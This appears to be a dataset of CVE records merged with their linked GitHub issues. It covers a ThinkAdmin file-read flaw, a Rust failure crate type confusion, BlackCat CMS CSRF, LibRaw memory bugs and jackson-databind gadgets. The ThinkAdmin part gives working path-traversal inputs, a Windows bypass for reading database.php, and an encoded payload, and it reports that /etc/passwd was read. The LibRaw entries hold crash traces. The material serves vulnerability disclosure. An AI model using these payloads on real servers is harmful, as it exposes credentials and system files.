``` 跟进`ModuleService::instance()->checkAllowDownload()`,文件路径`vendor/zoujingli/think-library/src/service/ModuleService.php`: ```php /** * 检查文件是否可下载 * @param string $name 文件名称 * @return boolean */ public function checkAllowDownload($name): bool { // 禁止下载数据库配置文件 if (stripos($name, 'database.php') !== false) { return false; } // 检查允许下载的文件规则 foreach ($this->getAllowDownloadRule() as $rule) { if (stripos($name, $rule) !== false) return true; } // 不在允许下载的文件规则 return false; } ``` 首先`$name`不能够是`database.php`,接着跟进`getAllowDownloadRule()`: ```php /** * 获取允许下载的规则 * @return array */ public function getAllowDownloadRule(): array { $data = $this->app->cache->get('moduleAllowRule', []); if (is_array($data) && count($data) > 0) return $data; $data = ['config', 'public/static', 'public/router.php', 'public/index.php']; foreach (array_keys($this->getModules()) as $name) $data[] = "app/{$name}"; $this->app->cache->set('moduleAllowRule', $data, 30); return $data; } ``` 有一个允许的列表: ``` config public/static public/router.php public/index.php app/admin app/wechat ``` 也就是说`$name`必须要不是`database.php`且要在允许列表内的文件才能够被读取,先绕过安全列表的限制,比如读取根目录的1.txt,只需要传入: ``` public/static/../../1.txt ``` 而`database.php`的限制在Linux下应该是没办法绕过的,但是在Windows下可以透过`"`来替换`.`,也就是传入: ``` public/static/../../config/database"php ``` 对应encode()后的结果为: ```php 34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34 ``` Windows读取`database.php`: ![圖片](https://user-images.githubusercontent.com/40329078/91416320-cf072a80-e881-11ea-8b32-b6be62ed3b49.png) 演示站读取`/etc/passwd`: ![圖片](https://user-images.githubusercontent.com/40329078/91416357-d8909280-e881-11ea-92ec-17be84abc6b7.png) v5连允许列表都没有,可以直接读任意文件。
ThinkAdmin v6 未授权列目录/任意文件读取
https://api.github.com/repos/zoujingli/ThinkAdmin/issues/244/comments
6
2020-08-27T08:28:52Z
2023-10-11T07:02:59Z
https://github.com/zoujingli/ThinkAdmin/issues/244
687,050,255
244
1,423
CVE-2020-25575
2020-09-14T19:15:11.397
An issue was discovered in the failure crate through 0.1.5 for Rust. It may introduce "compatibility hazards" in some applications, and has a type confusion flaw when downcasting. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: This may overlap CVE-2019-25010
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://boats.gitlab.io/blog/post/failure-to-fehler/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang-nursery/failure/issues/336" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://rustsec.org/advisories/RUSTSEC-2020-0036.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://boats.gitlab.io/blog/post/failure-to-fehler/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang-nursery/failure/issues/336" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://rustsec.org/advisories/RUSTSEC-2020-0036.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:failure_project:failure:*:*:*:*:*:rust:*:*", "matchCriteriaId": "4F8070E9-5A83-40C4-9E25-8B1BD2ECA198", "versionEndExcluding": null, "versionEndIncluding": "0.1.8", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "843" ]
843
https://github.com/rust-lang-nursery/failure/issues/336
[ "Patch", "Third Party Advisory" ]
github.com
[ "rust-lang-nursery", "failure" ]
I noticed that it is possible to cause type confusion in downcast by manually implementing `__private_get_type_id__`. https://play.rust-lang.org/?version=stable&mode=debug&edition=2018&gist=ad66fe439660eb8373996bfd6bd7a835 Although the name of the function clearly shows that it is a private API, I believe a safe Rust program should not violate the memory safety guaranteed by Rust type system.
Memory safe violation by abusing `__private_get_type_id__`
https://api.github.com/repos/rust-lang-deprecated/failure/issues/336/comments
1
2019-11-13T21:37:22Z
2019-11-13T22:14:21Z
https://github.com/rust-lang-deprecated/failure/issues/336
522,487,156
336
1,425
CVE-2020-25453
2020-09-15T22:15:13.507
An issue was discovered in BlackCat CMS before 1.4. There is a CSRF vulnerability (bypass csrf_token) that allows remote arbitrary code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/159237/BlackCat-CMS-1.3.6-Cross-Site-Request-Forgery.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/389" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/159237/BlackCat-CMS-1.3.6-Cross-Site-Request-Forgery.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/389" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:blackcat-cms:blackcat_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "5B574187-3443-4F7B-8C08-A3F44304A0F4", "versionEndExcluding": "1.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/BlackCatDevelopment/BlackCatCMS/issues/389
[ "Exploit", "Third Party Advisory" ]
github.com
[ "BlackCatDevelopment", "BlackCatCMS" ]
CSRF Bypass v1.3.6
https://api.github.com/repos/BlackCatDevelopment/BlackCatCMS/issues/389/comments
18
2020-05-30T21:28:59Z
2020-09-01T11:28:39Z
https://github.com/BlackCatDevelopment/BlackCatCMS/issues/389
627,825,969
389
1,426
CVE-2020-24889
2020-09-16T15:15:12.527
A buffer overflow vulnerability in LibRaw version < 20.0 LibRaw::GetNormalizedModel in src/metadata/normalize_model.cpp may lead to context-dependent arbitrary code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 4.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/334" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202010-05" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/334" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202010-05" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libraw:libraw:*:*:*:*:*:*:*:*", "matchCriteriaId": "290732D9-D09E-4149-AD2C-DCF404A1B24B", "versionEndExcluding": "0.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/LibRaw/LibRaw/issues/334
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibRaw", "LibRaw" ]
Reproduce steps: 1. compile provided test.c 2. run command:``./test poc`` Stack trace: ``` #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff6fb08b1 in __GI_abort () at abort.c:79 #2 0x00007ffff6ff9907 in __libc_message (action=action@entry=(do_abort | do_backtrace), fmt=fmt@entry=0x7ffff7126be8 "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:181 #3 0x00007ffff70a4eaf in __GI___fortify_fail_abort (need_backtrace=need_backtrace@entry=0x1, msg=msg@entry=0x7ffff7126b65 "buffer overflow detected") at fortify_fail.c:33 #4 0x00007ffff70a4ed1 in __GI___fortify_fail (msg=msg@entry=0x7ffff7126b65 "buffer overflow detected") at fortify_fail.c:44 #5 0x00007ffff70a2bc0 in __GI___chk_fail () at chk_fail.c:28 #6 0x00007ffff70a1e52 in __strcpy_chk (dest=dest@entry=0x7ffffff43e08 "", src=src@entry=0x7ffffff43354 "!\v", '!' <repeats 30 times>, "H\001\006", destlen=destlen@entry=0x20) at strcpy_chk.c:30 #7 0x00007ffff7ac6134 in strcpy (__src=0x7ffffff43354 "!\v", '!' <repeats 30 times>, "H\001\006", __dest=0x7ffffff43e08 "") at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:90 #8 LibRaw::parseHassyModel (this=this@entry=0x7ffffff43250) at src/metadata/hasselblad_model.cpp:136 #9 0x00007ffff7ab7fa8 in LibRaw::GetNormalizedModel (this=this@entry=0x7ffffff43250) at src/metadata/normalize_model.cpp:723 #10 0x00007ffff7a86c18 in LibRaw::identify (this=this@entry=0x7ffffff43250) at src/metadata/identify.cpp:1003 #11 0x00007ffff7b43f9e in LibRaw::open_datastream (this=0x7ffffff43250, stream=0x55555576a230) at src/utils/open.cpp:390 #12 0x00007ffff7b4c90d in LibRaw::open_buffer (this=0x7ffffff43250, buffer=0x555555769130, size=0xe1) at src/utils/open.cpp:153 #13 0x000055555555534b in LLVMFuzzerTestOneInput (data=0x555555769130 "II*", size=0xe1) at runlibraw.c:35 #14 0x0000555555554f0a in main (argc=argc@entry=0x2, argv=argv@entry=0x7fffffffe3c8) at runlibraw.c:100 #15 0x00007ffff6f91b97 in __libc_start_main (main=0x555555554e00 <main(int, char**)>, argc=0x2, argv=0x7fffffffe3c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe3b8) at ../csu/libc-start.c:310 #16 0x000055555555502a in _start () ``` Poc: [poc.tar.gz](https://github.com/LibRaw/LibRaw/files/5102710/poc.tar.gz)
buffer overflow
https://api.github.com/repos/LibRaw/LibRaw/issues/334/comments
4
2020-08-20T11:30:55Z
2020-09-24T15:18:58Z
https://github.com/LibRaw/LibRaw/issues/334
682,640,677
334
1,427
CVE-2020-24890
2020-09-16T15:15:12.603
libraw 20.0 has a null pointer dereference vulnerability in parse_tiff_ifd in src/metadata/tiff.cpp, which may result in context-dependent arbitrary code execution. Note: this vulnerability occurs only if you compile the software in a certain way
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.6, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 4.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/335" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EWHUZCRMGOC3QS6C65KWBM6ZJM25V6HI/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202010-05" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/335" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EWHUZCRMGOC3QS6C65KWBM6ZJM25V6HI/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202010-05" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libraw:libraw:0.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "3D26C9C4-BD7A-454F-96B3-06D1EFC4A5C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/LibRaw/LibRaw/issues/335
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibRaw", "LibRaw" ]
Reproduce steps: 1. compile provided test.c 2. run command:``./test poc`` Stack trace: ``` #0 0x00007ffff7afdcc7 in LibRaw::parse_tiff_ifd (this=this@entry=0x7ffffff43250, base=<optimized out>, base@entry=0x0) at src/metadata/tiff.cpp:617 #1 0x00007ffff7ae7d96 in LibRaw::parse_tiff (this=this@entry=0x7ffffff43250, base=base@entry=0x0) at src/metadata/tiff.cpp:1486 #2 0x00007ffff7a8248e in LibRaw::identify (this=this@entry=0x7ffffff43250) at src/metadata/identify.cpp:494 #3 0x00007ffff7b43f9e in LibRaw::open_datastream (this=0x7ffffff43250, stream=0x55555576a200) at src/utils/open.cpp:390 #4 0x00007ffff7b4c90d in LibRaw::open_buffer (this=0x7ffffff43250, buffer=0x555555769130, size=0xaa) at src/utils/open.cpp:153 #5 0x000055555555534b in LLVMFuzzerTestOneInput (data=0x555555769130 "II*", size=0xaa) at runlibraw.c:35 #6 0x0000555555554f0a in main (argc=argc@entry=0x2, argv=argv@entry=0x7fffffffe3c8) at runlibraw.c:100 #7 0x00007ffff6f91b97 in __libc_start_main (main=0x555555554e00 <main(int, char**)>, argc=0x2, argv=0x7fffffffe3c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe3b8) at ../csu/libc-start.c:310 #8 0x000055555555502a in _start () ``` Poc: [poc.tar.gz](https://github.com/LibRaw/LibRaw/files/5102895/poc.tar.gz)
segmentation fault in LibRaw::parse_tiff_ifd
https://api.github.com/repos/LibRaw/LibRaw/issues/335/comments
5
2020-08-20T12:18:12Z
2021-10-29T11:05:28Z
https://github.com/LibRaw/LibRaw/issues/335
682,668,248
335
1,428
CVE-2020-24750
2020-09-17T19:15:13.580
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/commit/ad5a630174f08d279504bc51ebba8772fd71b86b" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2798" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20201009-0003/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/commit/ad5a630174f08d279504bc51ebba8772fd71b86b" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2798" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20201009-0003/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "4892ABAA-57A0-43D3-965C-2D7F4A8A6024", "versionEndExcluding": "2.6.7.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "96DBACC5-AC30-4F2A-9615-DDC912A188B0", "versionEndExcluding": "2.9.10.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.7.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "C650FEDB-E903-4C2D-AD40-282AB5F2E3C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "A125E817-F974-4509-872C-B71933F42AD1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "97994257-C9A4-4491-B362-E8B25B7187AB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_corporate_lending_process_management:14.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "0CF9A061-2421-426D-9854-0A4E55B2961D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_corporate_lending_process_management:14.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "F95EDC3D-54BB-48F9-82F2-7CCF335FCA78", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_corporate_lending_process_management:14.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "B72B735F-4E52-484A-9C2C-23E6E2070385", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_credit_facilities_process_management:14.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "8B36A1D4-F391-4EE3-9A65-0A10568795BA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_credit_facilities_process_management:14.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "55116032-AAD1-4FEA-9DA8-2C4CBD3D3F61", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_credit_facilities_process_management:14.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "0275F820-40BE-47B8-B167-815A55DF578E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_liquidity_management:14.2:*:*:*:*:*:*:*", "matchCriteriaId": "B7FC2BF9-B6D7-420E-9CF5-21AB770B9CC1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_liquidity_management:14.3:*:*:*:*:*:*:*", "matchCriteriaId": "D4DAB919-54FD-48F8-A664-CD85C0A4A0E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_liquidity_management:14.5:*:*:*:*:*:*:*", "matchCriteriaId": "9D5A1417-2C59-431F-BF5C-A2BCFEBC95FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_supply_chain_finance:14.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "6A8420D4-AAF1-44AA-BF28-48EE3ED310B9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_supply_chain_finance:14.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "2FB80AC5-35F2-4703-AD93-416B46972EEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_supply_chain_finance:14.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "19DAAEFF-AB4A-4D0D-8C86-D2F2811B53B1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*", "matchCriteriaId": "D0DBC938-A782-433F-8BF1-CA250C332AA7", "versionEndExcluding": "21.1.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_calendar_server:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "5D55AB36-EDBB-4644-9579-21CE8278ED77", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "46059231-E7F6-4402-8119-1C7FE4ABEA96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "AE6D7E4F-FB11-4CED-81DB-D0BD21797C53", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*", "matchCriteriaId": 